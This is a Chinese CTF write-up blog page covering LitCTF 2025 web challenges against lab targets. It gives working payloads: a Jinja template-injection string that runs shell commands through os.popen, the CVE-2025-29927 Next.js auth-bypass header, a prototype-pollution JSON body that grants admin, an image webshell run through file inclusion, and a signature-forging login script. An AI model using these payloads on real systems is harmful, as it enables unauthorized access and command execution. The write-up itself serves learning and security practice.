

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.jpg">
  <link rel="icon" href="/img/avatar.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Lysander-xu">
  <meta name="keywords" content="">
  
    <meta name="description" content="easy_filebp抓包，发现进行了base64编码，发送到Intruder模块，设置position和base64-encode  开始爆破，发现302跳转  得到用户名&#x2F;密码：admin&#x2F;password，登录进入管理后台，进行文件上传 进行了后缀检测，php文件、.htaccess文件、.user.ini文件均不能上传 尝试上传jpg图片马，发现对内容也进行了检测，尝试">
<meta property="og:type" content="article">
<meta property="og:title" content="LitCTF2025_web">
<meta property="og:url" content="http://example.com/2025/05/28/LitCTF2025-web/index.html">
<meta property="og:site_name" content="blogs of Lysander-xu">
<meta property="og:description" content="easy_filebp抓包，发现进行了base64编码，发送到Intruder模块，设置position和base64-encode  开始爆破，发现302跳转  得到用户名&#x2F;密码：admin&#x2F;password，登录进入管理后台，进行文件上传 进行了后缀检测，php文件、.htaccess文件、.user.ini文件均不能上传 尝试上传jpg图片马，发现对内容也进行了检测，尝试">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef1.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef2.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef3.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef4.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef5.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/ntjs.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/dc.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es1.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es2.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es3.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es4.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es5.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/es6.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/j1.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/j2.png">
<meta property="og:image" content="http://example.com/2025/05/28/LitCTF2025-web/j3.png">
<meta property="article:published_time" content="2025-05-28T00:08:37.000Z">
<meta property="article:modified_time" content="2025-07-13T14:49:19.795Z">
<meta property="article:author" content="Lysander-xu">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2025/05/28/LitCTF2025-web/ef1.png">
  
  
  
  <title>LitCTF2025_web - blogs of Lysander-xu</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":6},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"r9vmK9fMUcr65tyIT646Ea7h-MdYXbMMI","app_key":"xd0pvfqXwvUGMywmXYH6JDqn","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>blogs of Lysander-xu</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="LitCTF2025_web"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-28 08:08" pubdate>
          2025年5月28日 早上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">LitCTF2025_web</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="easy-file"><a href="#easy-file" class="headerlink" title="easy_file"></a>easy_file</h3><p>bp抓包，发现进行了base64编码，发送到Intruder模块，设置position和base64-encode</p>
<p><img src="/2025/05/28/LitCTF2025-web/ef1.png" srcset="/img/loading.gif" lazyload></p>
<p>开始爆破，发现302跳转</p>
<p><img src="/2025/05/28/LitCTF2025-web/ef2.png" srcset="/img/loading.gif" lazyload></p>
<p>得到用户名&#x2F;密码：admin&#x2F;password，登录进入管理后台，进行文件上传</p>
<p>进行了后缀检测，php文件、.htaccess文件、.user.ini文件均不能上传</p>
<p>尝试上传jpg图片马，发现对内容也进行了检测，尝试用短标签绕过，上传成功，那如何利用呢</p>
<p>返回阅读登录界面源码时发现</p>
<p><img src="/2025/05/28/LitCTF2025-web/ef3.png" srcset="/img/loading.gif" lazyload></p>
<p>因为后台要求上传的就是一个头像文件，猜测需要利用file进行文件包含操作，尝试get传参</p>
<p><img src="/2025/05/28/LitCTF2025-web/ef4.png" srcset="/img/loading.gif" lazyload></p>
<p>确定进行了文件包含，利用上传的图片马进行命令执行，拿到flag</p>
<p><img src="/2025/05/28/LitCTF2025-web/ef5.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="nest-js"><a href="#nest-js" class="headerlink" title="nest_js"></a>nest_js</h3><p>弱口令admin&#x2F;password登录后，直接给了flag，非预期了</p>
<p>去看了官方的wp，这题是今年的一个CVE：CVE-2025-29927</p>
<p>看了一下漏洞原理及复现</p>
<blockquote>
<p>Next.js 在内部通过一个名为 <em>x-middleware-subrequest</em> 的请求头，来防止自身中间件的递归调用或无限循环。但研究者发现，攻击者可以在外部请求中人为加上此请求头，并使用特定格式，使 Next.js 中间件以为这是一个“子请求”，从而跳过原本应执行的认证或安全检查。</p>
<p>在请求中添加 <code>x-middleware-subrequest</code> 请求头，其值为<code>middleware:middleware:middleware:middleware:middleware</code>。Next.js 中间件会错误地处理此请求头并绕过身份验证检查（<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md%EF%BC%89">https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md）</a></p>
</blockquote>
<p>bp抓一个访问&#x2F;dashboard路由的包，添加该请求头，再放包</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-attribute">x-middleware-subrequest</span>: <span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:middleware<br></code></pre></td></tr></table></figure>

<p><img src="/2025/05/28/LitCTF2025-web/ntjs.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="星愿信箱"><a href="#星愿信箱" class="headerlink" title="星愿信箱"></a>星愿信箱</h3><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mel">过滤了&#123;&#123;&#125;&#125;，用&#123;%print()%&#125;代替即可<br>&#123;%print(url_for[<span class="hljs-string">&quot;__glo&quot;</span><span class="hljs-string">&quot;bals__&quot;</span>][<span class="hljs-string">&quot;o&quot;</span><span class="hljs-string">&quot;s&quot;</span>][<span class="hljs-string">&quot;po&quot;</span><span class="hljs-string">&quot;pen&quot;</span>](<span class="hljs-string">&quot;nl /f*&quot;</span>)[<span class="hljs-string">&quot;re&quot;</span><span class="hljs-string">&quot;ad&quot;</span>]())%&#125;<br></code></pre></td></tr></table></figure>

<h3 id="多重宇宙日记"><a href="#多重宇宙日记" class="headerlink" title="多重宇宙日记"></a>多重宇宙日记</h3><p>注册一个账号，查看源码，发现将数据包装在“setting”键下，不经任何处理直接将原始json提交，如果isAdmin的状态改变导航栏便会刷新</p>
<p>将isAdmin: true注入到Object.prototype，打原型链污染</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;settings&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>        <span class="hljs-attr">&quot;__proto__&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>            <span class="hljs-attr">&quot;isAdmin&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">true</span></span><br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>提交后出现一个管理员面板</p>
<p><img src="/2025/05/28/LitCTF2025-web/dc.png" srcset="/img/loading.gif" lazyload></p>
<p>访问即可拿到flag</p>
<h3 id="easy-signin"><a href="#easy-signin" class="headerlink" title="easy_signin"></a>easy_signin</h3><p>访问靶机，报403，dirsearch扫一下</p>
<p><img src="/2025/05/28/LitCTF2025-web/es1.png" srcset="/img/loading.gif" lazyload></p>
<p>访问&#x2F;login.html，是一个文档管理系统的登录界面，查看源码得到了一段实现登录表单的客户端验证和提交功能的js代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><code class="hljs javascript">&lt;script&gt;<br>     <span class="hljs-keyword">const</span> loginBtn = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;loginBtn&#x27;</span>);<br>     <span class="hljs-keyword">const</span> passwordInput = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;password&#x27;</span>);<br>     <span class="hljs-keyword">const</span> errorTip = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;errorTip&#x27;</span>);<br>     <span class="hljs-keyword">const</span> rawUsername = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;username&#x27;</span>).<span class="hljs-property">value</span>; <br>  <br>     loginBtn.<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">&#x27;click&#x27;</span>, <span class="hljs-title function_">async</span> () =&gt; &#123;<br>         <span class="hljs-keyword">const</span> rawPassword = passwordInput.<span class="hljs-property">value</span>.<span class="hljs-title function_">trim</span>();<br>         <span class="hljs-keyword">if</span> (!rawPassword) &#123;<br>             errorTip.<span class="hljs-property">textContent</span> = <span class="hljs-string">&#x27;请输入密码&#x27;</span>;<br>             errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">add</span>(<span class="hljs-string">&#x27;show&#x27;</span>);<br>             passwordInput.<span class="hljs-title function_">focus</span>();<br>             <span class="hljs-keyword">return</span>;<br>         &#125;<br><br>         <span class="hljs-keyword">const</span> md5Username = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-title class_">MD5</span>(rawUsername).<span class="hljs-title function_">toString</span>();   <br>         <span class="hljs-keyword">const</span> md5Password = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-title class_">MD5</span>(rawPassword).<span class="hljs-title function_">toString</span>();   <br>  <br>         <span class="hljs-keyword">const</span> shortMd5User = md5Username.<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>, <span class="hljs-number">6</span>);  <br>         <span class="hljs-keyword">const</span> shortMd5Pass = md5Password.<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>, <span class="hljs-number">6</span>);  <br>       <br>         <span class="hljs-keyword">const</span> timestamp = <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>().<span class="hljs-title function_">toString</span>(); <span class="hljs-comment">//五分钟</span><br>    <br>         <span class="hljs-keyword">const</span> secretKey = <span class="hljs-string">&#x27;easy_signin&#x27;</span>;  <br>         <span class="hljs-keyword">const</span> sign = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-title class_">MD5</span>(shortMd5User + shortMd5Pass + timestamp + secretKey).<span class="hljs-title function_">toString</span>();<br><br>         <span class="hljs-keyword">try</span> &#123;<br>             <span class="hljs-keyword">const</span> response = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">&#x27;login.php&#x27;</span>, &#123;<br>                 <span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,<br>                 <span class="hljs-attr">headers</span>: &#123;<br>                     <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;application/x-www-form-urlencoded&#x27;</span>,<br>                     <span class="hljs-string">&#x27;X-Sign&#x27;</span>: sign  <br>                 &#125;,<br>                 <span class="hljs-attr">body</span>: <span class="hljs-keyword">new</span> <span class="hljs-title class_">URLSearchParams</span>(&#123;<br>                     <span class="hljs-attr">username</span>: md5Username,   <br>                     <span class="hljs-attr">password</span>: md5Password,   <br>                     <span class="hljs-attr">timestamp</span>: timestamp<br>                 &#125;)<br>             &#125;);<br><br>             <span class="hljs-keyword">const</span> result = <span class="hljs-keyword">await</span> response.<span class="hljs-title function_">json</span>();<br>             <span class="hljs-keyword">if</span> (result.<span class="hljs-property">code</span> === <span class="hljs-number">200</span>) &#123;<br>                 <span class="hljs-title function_">alert</span>(<span class="hljs-string">&#x27;登录成功！&#x27;</span>);<br>                 <span class="hljs-variable language_">window</span>.<span class="hljs-property">location</span>.<span class="hljs-property">href</span> = <span class="hljs-string">&#x27;dashboard.php&#x27;</span>; <br>             &#125; <span class="hljs-keyword">else</span> &#123;<br>                 errorTip.<span class="hljs-property">textContent</span> = result.<span class="hljs-property">msg</span>;<br>                 errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">add</span>(<span class="hljs-string">&#x27;show&#x27;</span>);<br>                 passwordInput.<span class="hljs-property">value</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>                 passwordInput.<span class="hljs-title function_">focus</span>();<br>                 <span class="hljs-built_in">setTimeout</span>(<span class="hljs-function">() =&gt;</span> errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">remove</span>(<span class="hljs-string">&#x27;show&#x27;</span>), <span class="hljs-number">3000</span>);<br>             &#125;<br>         &#125; <span class="hljs-keyword">catch</span> (error) &#123;<br>             errorTip.<span class="hljs-property">textContent</span> = <span class="hljs-string">&#x27;网络请求失败&#x27;</span>;<br>             errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">add</span>(<span class="hljs-string">&#x27;show&#x27;</span>);<br>             <span class="hljs-built_in">setTimeout</span>(<span class="hljs-function">() =&gt;</span> errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">remove</span>(<span class="hljs-string">&#x27;show&#x27;</span>), <span class="hljs-number">3000</span>);<br>         &#125;<br>     &#125;);<br><br>     passwordInput.<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">&#x27;input&#x27;</span>, <span class="hljs-function">() =&gt;</span> &#123;<br>         errorTip.<span class="hljs-property">classList</span>.<span class="hljs-title function_">remove</span>(<span class="hljs-string">&#x27;show&#x27;</span>);<br>     &#125;);<br> &lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p>这段代码的主要功能是：对用户名和密码进行md5加密处理并截取部分字符（md5加密后的前6个字符），结合时间戳和固定密钥生成签名，通过 fetch API 将加密后的用户名、密码及时间戳发送到服务器，同时在请求头中携带签名用于验证；根据服务器返回结果，成功则跳转到仪表盘页面。</p>
<p>抓一个login.php的包，进行爆破，发现一个长度与其他不同的包，响应为：签名验证失败</p>
<p><img src="/2025/05/28/LitCTF2025-web/es2.png" srcset="/img/loading.gif" lazyload></p>
<p>得到用户名&#x2F;密码：admin&#x2F;admin123</p>
<p>这里让豆包生成了一个脚本去模拟浏览器行为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> requests<br><br><span class="hljs-comment"># 目标服务器信息</span><br>url = <span class="hljs-string">&quot;http://node6.anna.nssctf.cn:28080/login.php&quot;</span>  <span class="hljs-comment"># 正确的登录接口地址（与请求包一致）</span><br><br><span class="hljs-comment"># 登录凭证</span><br>username = <span class="hljs-string">&quot;admin&quot;</span><br>password = <span class="hljs-string">&quot;admin123&quot;</span><br>secret_key = <span class="hljs-string">&quot;easy_signin&quot;</span> <br><br><span class="hljs-comment"># 必要的请求头（模拟浏览器行为，包含Cookie和Referer）</span><br>headers = &#123;<br>    <span class="hljs-string">&quot;Host&quot;</span>: <span class="hljs-string">&quot;node6.anna.nssctf.cn:28080&quot;</span>,<br>    <span class="hljs-string">&quot;User-Agent&quot;</span>: <span class="hljs-string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0&quot;</span>,<br>    <span class="hljs-string">&quot;Accept&quot;</span>: <span class="hljs-string">&quot;*/*&quot;</span>,<br>    <span class="hljs-string">&quot;Accept-Language&quot;</span>: <span class="hljs-string">&quot;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&quot;</span>,<br>    <span class="hljs-string">&quot;Accept-Encoding&quot;</span>: <span class="hljs-string">&quot;gzip, deflate, br&quot;</span>,<br>    <span class="hljs-string">&quot;Referer&quot;</span>: <span class="hljs-string">&quot;http://node6.anna.nssctf.cn:28080/login.html&quot;</span>,  <span class="hljs-comment"># 必须与登录页一致，防止跨域限制</span><br>    <span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;application/x-www-form-urlencoded&quot;</span>,<br>    <span class="hljs-string">&quot;Origin&quot;</span>: <span class="hljs-string">&quot;http://node6.anna.nssctf.cn:28080&quot;</span>,<br>    <span class="hljs-string">&quot;Connection&quot;</span>: <span class="hljs-string">&quot;keep-alive&quot;</span>,<br>    <span class="hljs-string">&quot;Cookie&quot;</span>: <span class="hljs-string">&quot;Hm_lvt_648a44a949074de73151ffaa0a832aec=1751986143,1752076394,1752216051; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1752225180; HMACCOUNT=5E14CE8A33189EBE; PHPSESSID=8a052de2c9e042ee53b5c17f252c4880&quot;</span>,  <span class="hljs-comment"># 从请求包复制，保持会话</span><br>    <span class="hljs-string">&quot;Priority&quot;</span>: <span class="hljs-string">&quot;u=0&quot;</span><br>&#125;<br><br><span class="hljs-comment"># MD5加密函数</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">md5</span>(<span class="hljs-params">text</span>):<br>    <span class="hljs-keyword">return</span> hashlib.md5(text.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)).hexdigest()<br><br><span class="hljs-comment"># 1. 计算用户名和密码的完整MD5</span><br>md5_username = md5(username)  <span class="hljs-comment"># admin的MD5：21232f297a57a5a743894a0e4a801fc3</span><br>md5_password = md5(password)  <span class="hljs-comment"># admin123的MD5：0192023a7bbd73250516f069df18b500</span><br><br><span class="hljs-comment"># 2. 截取前6位MD5值</span><br>short_md5_user = md5_username[:<span class="hljs-number">6</span>]  <span class="hljs-comment"># 21232f</span><br>short_md5_pass = md5_password[:<span class="hljs-number">6</span>]  <span class="hljs-comment"># 019202</span><br><br><span class="hljs-comment"># 3. 生成当前时间戳（毫秒级，确保在服务器允许的有效期内，原代码注释为5分钟）</span><br>timestamp = <span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(time.time() * <span class="hljs-number">1000</span>))<br><br><span class="hljs-comment"># 4. 生成签名（与原代码逻辑一致）</span><br>sign_input = short_md5_user + short_md5_pass + timestamp + secret_key<br>sign = md5(sign_input)<br>headers[<span class="hljs-string">&quot;X-Sign&quot;</span>] = sign  <span class="hljs-comment"># 将签名添加到请求头</span><br><br><span class="hljs-comment"># 5. 构造请求体</span><br>data = &#123;<br>    <span class="hljs-string">&quot;username&quot;</span>: md5_username,<br>    <span class="hljs-string">&quot;password&quot;</span>: md5_password,<br>    <span class="hljs-string">&quot;timestamp&quot;</span>: timestamp<br>&#125;<br><br><span class="hljs-comment"># 6. 发送登录请求</span><br><span class="hljs-keyword">try</span>:<br>    response = requests.post(url, headers=headers, data=data, allow_redirects=<span class="hljs-literal">False</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;服务器响应状态码：<span class="hljs-subst">&#123;response.status_code&#125;</span>&quot;</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;响应内容：<span class="hljs-subst">&#123;response.text&#125;</span>&quot;</span>)<br>    <br>    <span class="hljs-comment"># 检查是否登录成功（根据原代码，成功会返回code=200并跳转dashboard.php）</span><br>    <span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:<br>        result = response.json()<br>        <span class="hljs-keyword">if</span> result.get(<span class="hljs-string">&quot;code&quot;</span>) == <span class="hljs-number">200</span>:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;登录成功！即将跳转至仪表盘...&quot;</span>)<br>            <span class="hljs-comment"># 若需要自动跳转，可使用以下代码（需安装selenium等工具模拟浏览器）</span><br>            <span class="hljs-comment"># print(f&quot;仪表盘地址：http://node6.anna.nssctf.cn:28080/dashboard.php&quot;)</span><br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;登录失败：<span class="hljs-subst">&#123;result.get(<span class="hljs-string">&#x27;msg&#x27;</span>)&#125;</span>&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;请求异常，状态码：<span 